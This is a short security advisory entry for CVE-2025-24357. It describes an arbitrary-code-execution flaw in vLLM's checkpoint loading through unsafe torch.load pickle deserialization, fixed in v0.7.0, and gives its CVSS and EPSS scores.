vLLM is a library for LLM inference and serving. vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from huggingface. It uses the torch.load function and the weights_only parameter defaults to False. When torch.load loads malicious pickle data, it will execute arbitrary code during unpickling. This vulnerability is fixed in v0.7.0.
CVE ID: CVE-2025-24357
CVSS Base Severity: HIGH
CVSS Base Score: 7.5
Vendor: vllm-project
Product: vllm
EPSS Score: 0.05% (probability of being exploited)
EPSS Percentile: 17.96% (scored less or equal to compared to others)
EPSS Date: 2025-02-25 (when was this score calculated)